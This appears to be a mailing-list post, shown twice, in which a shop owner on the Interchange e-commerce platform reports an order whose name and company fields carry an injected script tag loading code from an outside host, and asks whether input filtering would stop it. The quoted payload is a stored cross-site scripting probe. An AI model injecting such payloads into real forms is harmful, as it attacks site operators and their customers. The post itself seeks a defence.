I received an order with stuff like this
Name: Linda Juan">script src=//xss.re/692>/script>
Company: ">script src=//xss.re/692>/script>
Email address: juanlinda123@gmail.com
I'm using 5.10 and a modified foundation. The payment method was
check/money order. I'm hoping to prevent this of course. Adding a
[filter] to input fields on the order form is the first thing that comes
to mind. Is that a reasonable solution?
DB
_______________________________________________
interchange-users mailing list
interchange-users@icdevgroup.org
http://www.icdevgroup.org/mailman/listinfo/interchange-users
Name: Linda Juan">script src=//xss.re/692>/script>
Company: ">script src=//xss.re/692>/script>
Email address: juanlinda123@gmail.com
I'm using 5.10 and a modified foundation. The payment method was
check/money order. I'm hoping to prevent this of course. Adding a
[filter] to input fields on the order form is the first thing that comes
to mind. Is that a reasonable solution?
DB
_______________________________________________
interchange-users mailing list
interchange-users@icdevgroup.org
http://www.icdevgroup.org/mailman/listinfo/interchange-users